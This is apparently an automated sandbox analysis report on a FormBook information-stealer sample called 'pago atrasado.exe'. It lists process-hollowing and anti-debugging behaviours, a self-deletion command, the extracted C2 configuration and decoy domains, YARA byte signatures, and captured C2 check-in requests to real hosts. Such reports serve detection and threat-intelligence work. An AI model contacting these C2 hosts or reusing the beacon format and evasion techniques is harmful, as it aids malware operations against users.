Windows Analysis Report pago atrasado.exe

Overview

General Information

Sample Name: pago atrasado.exe
Analysis ID: 502137
MD5: f841c72b1c4cadc4c98903ad26a96a16
SHA1: 06359aaf42a5ce60889ab7a93d8af7702b34630a
SHA256: eaa038a0020fee7ddfe2919203f20f15ca1d7eb19d90b168cade93b5cf8d7f43
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • pago atrasado.exe (PID: 4308 cmdline: 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F841C72B1C4CADC4C98903AD26A96A16)
    • pago atrasado.exe (PID: 2840 cmdline: 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F841C72B1C4CADC4C98903AD26A96A16)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 248 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 4940 cmdline: /c del 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.crisisinterventionadvocates.com/u9xn/"], "decoy": ["lifeguardingcoursenearme.com", "bolsaspapelcdmx.com", "parsleypkllqu.xyz", "68134.online", "shopthatlookboutique.com", "canlibahisportal.com", "oligopoly.city", "srchwithus.online", "151motors.com", "17yue.info", "auntmarysnj.com", "hanansalman.com", "heyunshangcheng.info", "doorslamersplus.com", "sfcn-dng.com", "highvizpeople.com", "seoexpertinbangladesh.com", "christinegagnonjewellery.com", "artifactorie.biz", "mre3.net", "webbyteanalysis.online", "medicmir.store", "shdxh.com", "salvationshippingsecurity.com", "michita.xyz", "itskosi.com", "aligncoachingconsulting.com", "cryptorickclub.art", "cyliamartisbackup.com", "ttemola.com", "mujeresenfarmalatam.com", "mykombuchafactory.com", "irasutoya-ryou.com", "envtmyouliqy.mobi", "expert-rse.com", "oddanimalsink.com", "piezoelectricenergy.com", "itservices-india.com", "wintwiin.com", "umgaleloacademy.com", "everythangbutwhite.com", "ishhs.xyz", "brandsofcannabis.com", "sculptingstones.com", "hilldetailingllc.com", "stone-project.net", "rbrituelbeaute.com", "atzoom.store", "pronogtiki.store", "baybeg.com", "b148tlrfee9evtvorgm5947.com", "msjanej.com", "western-overseas.info", "sharpecommunications.com", "atlantahomesforcarguys.com", "neosudo.com", "blulacedefense.com", "profilecolombia.com", "blacksaltspain.com", "sejiw3.xyz", "saint444.com", "getoken.net", "joycegsy.com", "fezora.xyz"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      1.1.pago atrasado.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        1.1.pago atrasado.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.pago atrasado.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        1.2.pago atrasado.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          1.2.pago atrasado.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
          Yara detected FormBook
          Source: Yara match | File source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY
          Machine Learning detection for sample
          Source: pago atrasado.exe | Joe Sandbox ML: detected
          Source: 0.2.pago atrasado.exe.2330000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 16.2.colorcpl.exe.4a4796c.4.unpack | Avira: Label: TR/Patched.Ren.Gen
          Source: 16.2.colorcpl.exe.2b2c88.1.unpack | Avira: Label: TR/Patched.Ren.Gen
          Source: 1.2.pago atrasado.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.pago atrasado.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: pago atrasado.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: colorcpl.pdbGCTL source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: pago atrasado.exe, 00000000.00000003.243423683.000000000F230000.00000004.00000001.sdmp, pago atrasado.exe, 00000001.00000003.248757919.0000000000670000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: pago atrasado.exe, colorcpl.exe
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 4x nop then pop ebx 1_2_00406AB4
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 4x nop then pop ebx 16_2_02B06AB5

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.crisisinterventionadvocates.com
          Source: C:\Windows\explorer.exe | Domain query: www.ttemola.com
          Source: C:\Windows\explorer.exe | Network Connect: 208.91.197.27 80
          Source: C:\Windows\explorer.exe | Network Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exe | Network Connect: 46.101.121.244 80
          Source: C:\Windows\explorer.exe | Network Connect: 74.208.236.134 80
          Source: C:\Windows\explorer.exe | Domain query: www.baybeg.com
          Source: C:\Windows\explorer.exe | Domain query: www.everythangbutwhite.com
          Source: C:\Windows\explorer.exe | Domain query: www.highvizpeople.com
          Source: C:\Windows\explorer.exe | Domain query: www.itskosi.com
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Domain query: www.oddanimalsink.com
          Source: C:\Windows\explorer.exe | Domain query: www.ishhs.xyz
          Source: C:\Windows\explorer.exe | Domain query: www.sfcn-dng.com
          Source: C:\Windows\explorer.exe | Domain query: www.umgaleloacademy.com
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exe | DNS query: www.ishhs.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor | URLs: www.crisisinterventionadvocates.com/u9xn/
          Source: Joe Sandbox View | ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
          Source: global traffic | HTTP traffic detected: GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1; Host: www.highvizpeople.com; Connection: close
          Source: global traffic | HTTP traffic detected: GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1; Host: www.oddanimalsink.com; Connection: close
          Source: global traffic | HTTP traffic detected: GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1; Host: www.itskosi.com; Connection: close
          Source: global traffic | HTTP traffic detected: GET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1; Host: www.crisisinterventionadvocates.com; Connection: close
          Source: global traffic | HTTP traffic detected: GET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1; Host: www.everythangbutwhite.com; Connection: close
          Source: Joe Sandbox View | IP Address: 208.91.197.27 208.91.197.27
          Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: openresty; Date: Wed, 13 Oct 2021 14:44:25 GMT; Content-Type: text/html; Content-Length: 275; ETag: "615f9601-113"; Via: 1.1 google; Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Content-Length: 626; Connection: close; Date: Wed, 13 Oct 2021 14:44:46 GMT; Server: Apache | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.otf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/27586/searchbtn.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/BG_2.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/Left.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/Right.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
          Source: pago atrasado.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: pago atrasado.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://www.Highvizpeople.com
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://www.everythangbutwhite.com
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://www.everythangbutwhite.com/
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://www.highvizpeople.com/10_Best_Mutual_Funds.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://www.highvizpeople.com/Accident_Lawyers.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FL
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://www.highvizpeople.com/Best_Penny_Stocks.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2F
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://www.highvizpeople.com/Migraine_Pain_Relief.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://www.highvizpeople.com/__media__/design/underconstructionnotice.php?d=highvizpeople.com
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://www.highvizpeople.com/__media__/js/trademark.php?d=highvizpeople.com&type=ns
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://www.highvizpeople.com/display.cfm
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://www.highvizpeople.com/px.js?ch=1
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://www.highvizpeople.com/px.js?ch=2
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://www.highvizpeople.com/sk-logabpstatus.php?a=MzZzaVd5UDZhY0hEU3Z1UzFXVHRjNXcrTjlwaWZWbWlYbHV5Y
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp | String found in binary or memory: http://www.highvizpeople.com/song_lyrics.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FLdrtTp
          Source: unknown | DNS traffic detected: queries for: www.highvizpeople.com
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FC2

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
